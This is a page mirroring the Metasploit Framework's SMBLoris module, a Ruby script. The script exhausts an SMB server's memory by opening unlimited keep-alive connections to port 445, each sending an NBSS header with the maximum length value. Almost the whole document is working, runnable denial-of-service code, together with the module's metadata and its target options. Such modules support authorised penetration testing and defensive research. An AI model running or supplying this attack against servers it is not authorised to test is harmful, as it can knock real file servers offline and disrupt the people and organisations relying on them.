Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/smb/smb_loris.rb
19516 views
1
#!/usr/bin/env ruby

2


3
require 'socket'

4
require 'metasploit'

5


6
require 'bindata'

7


8
class NbssHeader < BinData::Record

9
  endian  :little

10
  uint8   :message_type

11
  bit7    :flags

12
  bit17   :message_length

13
end

14


15
metadata = {

16
  name: 'SMBLoris NBSS Denial of Service',

17
  description: %q{

18
    The SMBLoris attack consumes large chunks of memory in the target by sending

19
    SMB requests with the NetBios Session Service(NBSS) Length Header value set

20
    to the maximum possible value. By keeping these connections open and initiating

21
    large numbers of these sessions, the memory does not get freed, and the server

22
    grinds to a halt. This vulnerability was originally disclosed by Sean Dillon

23
    and Zach Harding.

24


25
    DISCLAIMER: This module opens a lot of simultaneous connections. Please check

26
    your system's ULIMIT to make sure it can handle it. This module will also run

27
    continuously until stopped.

28
  },

29
  authors: [

30
    'thelightcosine',

31
    'Adam Cammack <adam_cammack[at]rapid7.com>'

32
  ],

33
  date: '2017-06-29',

34
  references: [

35
    { type: 'url', ref: 'https://web.archive.org/web/20170804072329/https://smbloris.com/' },

36
    { type: 'aka', ref: 'SMBLoris' }

37
  ],

38
  type: 'dos',

39
  options: {

40
    rhost: { type: 'address', description: 'The target address', required: true, default: nil },

41
    rport: { type: 'port', description: 'SMB port on the target', required: true, default: 445 }

42
  }

43
}

44


45
def run(args)

46
  header = NbssHeader.new

47
  header.message_length = 0x01FFFF

48


49
  last_reported = 0

50
  warned = false

51
  n_loops = 0

52
  sockets = []

53


54
  target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)

55


56
  Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "

57


58
  loop do

59
    sockets.delete_if(&:closed?)

60


61
    nsock = target.connect(timeout: 360)

62
    nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)

63
    nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))

64
    nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))

65
    nsock.setsockopt(Socket::Option.linger(true, 60))

66
    nsock.write(header.to_binary_s)

67
    sockets << nsock

68


69
    n_loops += 1

70
    if last_reported != sockets.length

71
      if n_loops % 100 == 0

72
        last_reported = sockets.length

73
        Metasploit.log "#{sockets.length} socket(s) open", level: 'info'

74
      end

75
    elsif n_loops % 1000 == 0

76
      Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'

77
    end

78
  rescue Interrupt

79
    sockets.each(&:close)

80
    break

81
  rescue Errno::EMFILE

82
    Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing your system limits.", level: 'warning' unless warned

83
    warned = true

84
    sockets.slice(0).close

85
  rescue StandardError => e

86
    Metasploit.log "Exception sending packet: #{e.message}", level: 'error'

87
  end

88
end

89


90
if __FILE__ == $PROGRAM_NAME

91
  Metasploit.run(metadata, method(:run))

92
end

93


94